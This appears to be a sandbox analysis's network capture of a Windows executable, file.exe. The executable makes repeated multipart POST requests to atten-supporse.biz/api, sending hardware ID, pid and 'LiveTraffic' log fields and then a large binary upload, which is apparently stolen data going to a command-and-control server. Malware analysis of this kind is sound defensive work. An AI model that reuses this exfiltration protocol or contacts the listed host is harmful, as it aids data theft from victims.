63 41 63 2f 73 62 45 34 6a 4d 47 73 36 72 51 33 58 50 52 Data Ascii: fyTOWyZqL8sf2cgJswTeEASukaPiIfPLwbj59CLc4Xlo+0KU4y/rGM6TDFl01NmQEq6Bpyeh/B9WbOjnsgyiqv4vxVHiLmsaANoGzfLDXxCbfda2cXE8jo/zcmCwiOK59eqCk21kZg+OkZ0A88LfEASukaPiIfPLwbj59LpNISpu7JJWMu573duGHY3jEU/R1/oTMnT0eF6P83JgsIjiufKoANXnqy/KANoGzfLDXxCecAc/sbE4jMGs6rQ3XPR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:06 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DDHQPF21IJA7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12805 Host: atten-supporse.biz
2024-12-09 23:42:06 UTC	12805	OUT	Data Raw: 2d 2d 44 44 48 51 50 46 32 31 49 4a 41 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 37 36 43 35 35 39 45 34 46 46 36 41 37 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 44 44 48 51 50 46 32 31 49 4a 41 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 44 48 51 50 46 32 31 49 4a 41 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 44 48 51 50 46 32 31 Data Ascii: --DDHQPF21IJA7Content-Disposition: form-data; name="hwid"D276C559E4FF6A7223D904AF30EFEBBC--DDHQPF21IJA7Content-Disposition: form-data; name="pid"2--DDHQPF21IJA7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DDHQPF21
2024-12-09 23:42:07 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=okddmbcbuljd13idd5attufr71; expires=Fri, 04-Apr-2025 17:28:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FWyC%2FSR4ekvAeQL0ToEg1trEE0pGpCvCuD4uJAjy4O62K6Q2m2mzmyYnhSP76Tlupb%2BflDS23CiDqCTjNw25NWxMZoihtsYMf0eyymH9bV%2BAx8ppLE6SFdx02zBMLA9GRTC2cQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d9899cf8c3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1557&rtt_var=587&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13741&delivery_rate=1857506&cwnd=160&unsent_bytes=0&cid=e811694babfc2032&ts=921&x=0"
2024-12-09 23:42:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:42:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:08 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q3PW8LXT5YT0RLD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15065 Host: atten-supporse.biz
2024-12-09 23:42:08 UTC	15065	OUT	Data Raw: 2d 2d 51 33 50 57 38 4c 58 54 35 59 54 30 52 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 37 36 43 35 35 39 45 34 46 46 36 41 37 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 51 33 50 57 38 4c 58 54 35 59 54 30 52 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 33 50 57 38 4c 58 54 35 59 54 30 52 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d Data Ascii: --Q3PW8LXT5YT0RLDContent-Disposition: form-data; name="hwid"D276C559E4FF6A7223D904AF30EFEBBC--Q3PW8LXT5YT0RLDContent-Disposition: form-data; name="pid"2--Q3PW8LXT5YT0RLDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-09 23:42:09 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h0tuuue4vrj9fref9aj8tqoa9v; expires=Fri, 04-Apr-2025 17:28:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yH%2B9CbmVvGjlKH6sJ1Hy%2Bw1YLWmspmvXFfnxWWz0h2yZFbBisySXDyUPf9hofSmHadTxFr8mKiffyqoEbxUjg8VIMEy1NBeYj2q38ID4dQHftUZ1t9Yv17Qb8HywJLRKLShj1d0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d9990be28c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=2063&rtt_var=780&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16004&delivery_rate=1397797&cwnd=196&unsent_bytes=0&cid=e82565b3c3de8dc0&ts=1282&x=0"
2024-12-09 23:42:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:42:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:11 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q6XCM8Q5QSJ159Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20555 Host: atten-supporse.biz
2024-12-09 23:42:11 UTC	15331	OUT	Data Raw: 2d 2d 51 36 58 43 4d 38 51 35 51 53 4a 31 35 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 37 36 43 35 35 39 45 34 46 46 36 41 37 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 51 36 58 43 4d 38 51 35 51 53 4a 31 35 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 36 58 43 4d 38 51 35 51 53 4a 31 35 39 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d Data Ascii: --Q6XCM8Q5QSJ159QContent-Disposition: form-data; name="hwid"D276C559E4FF6A7223D904AF30EFEBBC--Q6XCM8Q5QSJ159QContent-Disposition: form-data; name="pid"3--Q6XCM8Q5QSJ159QContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-09 23:42:11 UTC	5224	OUT	Data Raw: c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
2024-12-09 23:42:12 UTC	1025	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=79j35burcm43vqdnklft9a89m5; expires=Fri, 04-Apr-2025 17:28:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQpopsSEVs32XxNKyqtGXqXWq0oEZm%2BxhX10UtCIcmR%2B%2FBbhTKc6952I9bFF3t3TDH9GeI8v7ng6%2BwJOywwz98850JKuLoz12GM%2F%2B7vm28idU2K1oCJdRtnnVfsRKtPqnLQPx8E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d9ab08487d05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1810&rtt_var=693&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21516&delivery_rate=1613259&cwnd=195&unsent_bytes=0&cid=2a762be9a8abd349&ts=917&x=0"
2024-12-09 23:42:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:42:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:13 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C4UKFQXE8K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1217 Host: atten-supporse.biz
2024-12-09 23:42:13 UTC	1217	OUT	Data Raw: 2d 2d 43 34 55 4b 46 51 58 45 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 37 36 43 35 35 39 45 34 46 46 36 41 37 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 43 34 55 4b 46 51 58 45 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 34 55 4b 46 51 58 45 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 43 34 55 4b 46 51 58 45 38 4b 0d 0a 43 6f Data Ascii: --C4UKFQXE8KContent-Disposition: form-data; name="hwid"D276C559E4FF6A7223D904AF30EFEBBC--C4UKFQXE8KContent-Disposition: form-data; name="pid"1--C4UKFQXE8KContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--C4UKFQXE8KCo
2024-12-09 23:42:14 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ifsvkb16so5rrc4khurehf4jou; expires=Fri, 04-Apr-2025 17:28:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2M2YLHEcnVNfXjzmgdbxO4HH3KrR4Mo%2BKKfs7IsWMtyjTzOOJXnOVS4YXp68hm%2Bvt1pfPY66p2dUisKHKLwlshryefVCQem%2FyQmUYDIisFUKeodfxlUGVnYUw4BpP59Gto0Qkw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d9ba2b2643df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1590&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2128&delivery_rate=1836477&cwnd=243&unsent_bytes=0&cid=757d2e07c6a5fe79&ts=732&x=0"
2024-12-09 23:42:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:42:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.80.1	443	3944	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:42:16 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3JSBVCBAM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570231 Host: atten-supporse.biz
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: 2d 2d 33 4a 53 42 56 43 42 41 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 37 36 43 35 35 39 45 34 46 46 36 41 37 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 33 4a 53 42 56 43 42 41 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4a 53 42 56 43 42 41 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 4a 53 42 56 43 42 41 4d 0d 0a 43 6f 6e 74 65 6e Data Ascii: --3JSBVCBAMContent-Disposition: form-data; name="hwid"D276C559E4FF6A7223D904AF30EFEBBC--3JSBVCBAMContent-Disposition: form-data; name="pid"1--3JSBVCBAMContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3JSBVCBAMConten
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: 41 7b 19 6f f6 ac 0e 30 18 65 ec 12 92 27 a7 ca ce d5 8a 30 28 10 e6 09 27 2f 11 7a 3b a0 39 21 ec 73 6a 15 0a ce 6c 80 97 c6 c4 0c 78 ab 61 ea 0f cc bd 16 ac 33 fc 31 d3 ba fd f0 94 40 67 69 2e 16 36 5a b2 cd 2b de 91 f2 72 1b 75 73 6a d6 bc 4a 61 a6 54 79 35 94 11 9f 33 cf 18 4e c2 1c eb f5 76 02 51 20 46 1a 9c 6d 6f cc c9 6b 45 77 3e 86 bb 84 7f ee 01 2f bc c5 e8 f3 6d 91 ac 83 4a 0b 5d d7 29 58 f8 b6 18 4e df 5d 8f 9b c4 cd 0c 5a 75 53 1a be a0 e2 29 2a 8f 5d bf ac a0 95 06 0b 92 bb 8f eb ea 67 3c a4 d6 4f a0 1b 32 33 a2 cd b1 31 53 e5 13 c8 cc 6c 54 a1 28 8f 8e d4 bb 3e fc 49 4f 6a 4f 62 fb a7 9f 5f 70 3f 4c 13 64 1b a0 93 45 c9 46 18 41 a8 0b 9b 20 71 d7 62 d3 09 03 53 a1 89 a5 cd 92 54 29 4a 7a 43 a4 a1 10 f1 03 48 0e db c9 cc d7 4a 98 b9 6f 49 36 Data Ascii: A{o0e'0('/z;9!sjlxa31@gi.6Z+rusjJaTy53NvQ FmokEw>/mJ])XN]ZuS)*]g<O231SlT(>IOjOb_p?LdEFA qbST)JzCHJoI6
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: 39 d7 42 63 73 37 a8 51 5f 7f fb be 3a 75 01 79 4d 1a 38 8f 7a 87 34 9a fa 0a 89 94 5a b1 52 61 62 d9 12 7c 4d 73 58 ee e2 a6 b6 9f 3a 65 9f 00 ab 08 1f 4b bf 43 4e 3a e1 26 24 2e d5 fd 99 29 ae 34 76 03 1b 4b e0 70 2a f1 4a 72 b8 ee 6d c4 41 7b 47 07 bd 9e 24 e4 57 b9 3e e8 fc 34 95 1c 71 f7 b8 7f f5 16 9d 27 cc 30 b3 aa bc a7 a5 fe be 3b 49 b1 61 d4 0d f1 55 ed 89 b7 fb aa ff e2 f4 7d e8 d5 64 d7 88 a4 84 cf 0f 53 3b 57 dd 1f 86 13 51 fd 8f 69 81 42 e7 de af 57 72 5d 7f 95 f3 4d 1f 3c 35 f3 4f c3 27 e7 1f fd 47 71 73 46 e3 6a e9 d0 55 e7 b1 7d 65 1b 3d cc 92 01 bf 80 8f c3 a1 6f b9 5d 79 9b 9f 4d 0d 22 6e 3a 97 86 5c 6e 06 ac 87 e5 91 a3 b9 15 ab a1 c1 c3 45 42 43 5f 76 65 28 d2 47 92 6c ab e9 11 6c 4b db d8 3c b6 dd 74 83 ed ad b2 d1 7b a5 21 d5 e2 bd Data Ascii: 9Bcs7Q_:uyM8z4ZRab\|MsX:eKCN:&$.)4vKp*JrmA{G$W>4q'0;IaU}dS;WQiBWr]M<5O'GqsFjU}e=o]yM"n:\nEBC_ve(GllK<t{!
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: a9 42 bd 67 3a b1 e5 6d e3 7d 56 f1 e3 93 33 83 30 ef 18 92 ba 49 5b e5 ad 12 aa fc f6 7e 7c 92 3b bb 72 88 eb c6 fa 41 76 ca 5f 91 07 bc 8a 75 b6 b3 0d 11 8f e9 56 e5 f6 9d a2 4c 62 db fb 21 91 d5 2e 9f 0c 8b 75 18 91 0a b1 2d d1 86 b9 b7 22 b4 a6 d9 81 bd 81 63 10 23 b2 00 4d f9 25 4b 93 dd 03 ca f6 40 86 dc 60 5c 33 43 07 0b f7 b1 69 0e a0 80 0e b2 ff 26 7c 22 71 4f d5 a8 18 28 42 a0 20 d0 23 70 be 90 1b fa 74 a1 7d 77 03 03 5e 21 84 17 17 68 24 90 3f 29 e7 99 62 33 ef eb 6b 71 e7 5d 3a 76 16 8e 1e 7f 5d a7 a6 ef 01 d3 bd 14 23 40 4e 47 c4 89 6e 98 82 ee b3 c2 ac 0f 12 2d 88 f2 2f c1 38 d8 c6 5a e9 d9 f0 30 af 63 cd a9 94 ee 3e 7d 54 77 35 51 11 35 9c 48 a4 e9 2a a2 d2 0a 8e a9 73 21 5f 53 e1 66 96 6d 90 27 28 3a 97 a4 4f e2 66 c2 16 8a c4 b7 f0 60 44 Data Ascii: Bg:m}V30I[~\|;rAv_uVLb!.u-"c#M%K@`\3Ci&\|"qO(B #pt}w^!h$?)b3kq]:v]#@NGn-/8Z0c>}Tw5Q5H*s!_Sfm'(:Of`D
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: 71 ad 36 75 01 3d d8 ac 03 d2 32 bb bb fd 5b 52 d4 b6 3e 2d 83 bf b8 5b 05 d7 8c 48 ed 7b 32 f3 8c 27 a0 87 5f c9 55 fe c4 a2 4d 81 a9 4b 45 2b 35 35 15 3e 52 ef f6 45 f1 da 5d 80 75 59 a5 f8 9f 0e bf 33 d4 6c d3 16 04 ed bc 46 a4 fa 7a 41 7f 88 33 4d 7c b6 f0 8b 3b 7b 92 d0 de 13 a4 c0 6c 78 02 c9 0e c2 77 31 33 23 8c c0 39 e6 57 4b e7 6c 3f ec 22 c0 6f 3d 15 94 5c e7 d7 81 ce 54 61 3b f5 3d b8 64 9a e7 2e c8 c1 45 6c 87 7f 86 0c 5c c9 a5 28 cf 4e 3c 94 d4 0c d7 50 bd e8 35 38 6b 55 e3 99 56 80 7b 54 33 33 e6 f7 dc 27 6a ac 09 cc 0d 26 90 47 c6 f2 9b 89 3b 83 27 8a 71 76 0e ef 97 b7 cc 11 d5 1b f7 33 9d 4f 5e 19 4b 5b b8 30 e0 d3 db e0 a8 67 83 9d bc 8e 49 41 53 5f 06 c7 6e 48 26 51 85 51 02 27 c6 21 52 30 71 1a 31 96 45 fc 56 af 5a c4 fa 28 1f 87 db 9d Data Ascii: q6u=2[R>-[H{2'_UMKE+55>RE]uY3lFzA3M\|;{lxw13#9WKl?"o=\Ta;=d.El\(N<P58kUV{T33'j&G;'qv3O^K[0gIAS_nH&QQ'!R0q1EVZ(
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: 33 0d 88 07 48 4c 50 c0 63 70 32 9f 35 ef fc 7d 60 92 cf 66 76 96 f4 f6 6b d4 48 5f 6e f8 9b f5 86 56 66 ca c7 bd f2 87 54 9e 7f 78 f7 17 92 ae dc 3f 89 bf 1b 06 05 fe 33 1e d9 86 05 36 82 3b e9 6b 09 b0 89 a1 85 e2 c2 74 7f 19 6a b1 f1 0f 28 77 30 a1 eb ea 03 10 30 bd c5 57 43 bb d8 1f e6 d3 79 90 24 a3 cc 9d e1 29 3d 8f 07 fe cb 8f c2 48 aa 3c 3c 6f f8 f1 76 dc 19 07 31 98 fe db bc 1e 58 10 c5 6b ba 35 05 f8 2b 7a de a0 db 6e 4e 16 b6 8a 96 01 68 fb 01 e2 9d d3 4c b0 f0 c5 5a 1b e3 41 0c 4b 04 63 47 74 33 1d 5e dc 9f b6 8c 6f 0d 33 30 33 72 28 9e fb 24 7b c3 5c c3 1e 16 e5 df c5 be 21 5d f0 94 02 b6 94 18 1d 3e 6d 05 c2 83 a1 f2 fb 89 69 c9 f0 08 f7 08 3d 16 a2 47 13 02 6a 42 b6 3f 0a 78 c8 be 0d 25 57 7c b9 a2 ba a7 bc 76 fb 3b d3 85 21 6e 5e fe b8 89 Data Ascii: 3HLPcp25}`fvkH_nVfTx?36;ktj(w00WCy$)=H<<ov1Xk5+znNhLZAKcGt3^o303r(${\!]>mi=GjB?x%W\|v;!n^
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: e7 79 b8 8a b7 13 87 ab d3 92 57 12 43 cd 53 a3 6c 03 68 4b 2f ba 24 6d 08 8a 34 5b 73 e1 98 a7 61 8b 97 5c a1 9a a5 ec 76 27 94 5e ff bc 3b 9f 29 8e 6f 2e 68 9a 3f 37 bb dd d9 cc d0 61 a9 d9 0c 6f 88 de 9a 2a 37 6d 61 bf 7b a5 91 f0 4a be f2 d4 6f d6 93 96 cd 06 ff e1 83 a4 8e 5f 6e 5c 4e 73 29 21 29 73 dc 3a 19 fa c0 7c 05 fa 17 b7 c8 9b 3d 52 f8 54 af d4 c6 fc fe 51 80 db c5 18 91 19 21 a6 f1 6c d8 ce 5e 1e ab 19 78 57 fe c7 78 61 57 e7 a8 30 8a a4 0f fc e4 88 44 e9 8d c9 96 42 90 e0 61 8c db 78 c8 fe c8 ff 32 17 83 31 e1 2b e4 2c 16 0a 6f 7f dd d8 5c 59 2c ec 12 76 83 e8 c7 f5 bf c4 6b b2 26 b9 ae 06 8b e3 e3 e7 68 25 3c 49 c7 08 2a 02 54 dc ee cf f3 c4 2b bc 3d 45 ed 89 1a 42 1f c8 03 68 30 9d f6 f4 8e ed 86 b3 32 b0 6e a5 bb ba 19 14 a4 72 1a b4 9a Data Ascii: yWCSlhK/$m4[sa\v'^;)o.h?7ao7ma{Jo_n\Ns)!)s:\|=RTQ!l^xWxaW0DBax21+,o\Y,vk&h%<IT+=EBh02nr
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: d7 5e 01 50 bf 5f 61 82 a4 33 59 cb 9b 4d 03 42 72 c2 60 46 4d 65 6a ef 4e be 52 93 69 74 fa 5b ec b2 4a e4 e8 40 a8 31 ab b8 22 08 60 b1 67 5e 0b 4d 9a 19 89 2e 7b eb 8e 55 ae e7 21 fa 5f 56 f6 e5 78 db 70 ab 7f 3e d3 e8 6e de c4 fc 6f 89 85 70 54 78 ca 6b 40 0f 3e 1c db 16 f7 9d f3 cc 62 af 51 f8 cd ae f7 1c 92 59 19 9b 93 f8 2f e1 d0 8e dd cc 99 67 33 5e 37 20 4a d9 8e ed 32 fd 29 55 07 9f 84 92 8d de 01 8a 93 bd 1e 1a 48 23 70 d8 93 33 19 21 42 57 b5 db 87 ae f9 df c2 be 3f ef d9 49 88 8f 20 30 f4 ea 90 e4 cb 3d 42 4e 22 7a e5 4d e8 fe 40 21 c6 5e b7 e7 16 4b df 6e 4f 5c 2d b8 9d de de 72 dc 2b 58 21 d5 e6 8c ad 34 76 5e 1a f4 ea 46 1b 5c 3c 8b 24 df aa 45 b4 6e 03 21 c5 7f 00 a5 6c 13 a8 ae 07 41 e6 94 fe 14 05 8e 44 bd 7b 31 27 c9 f4 ab 09 76 e9 b3 Data Ascii: ^P_a3YMBr`FMejNRit[J@1"`g^M.{U!_Vxp>nopTxk@>bQY/g3^7 J2)UH#p3!BW?I 0=BN"zM@!^KnO\-r+X!4v^F\<$En!lAD{1'v
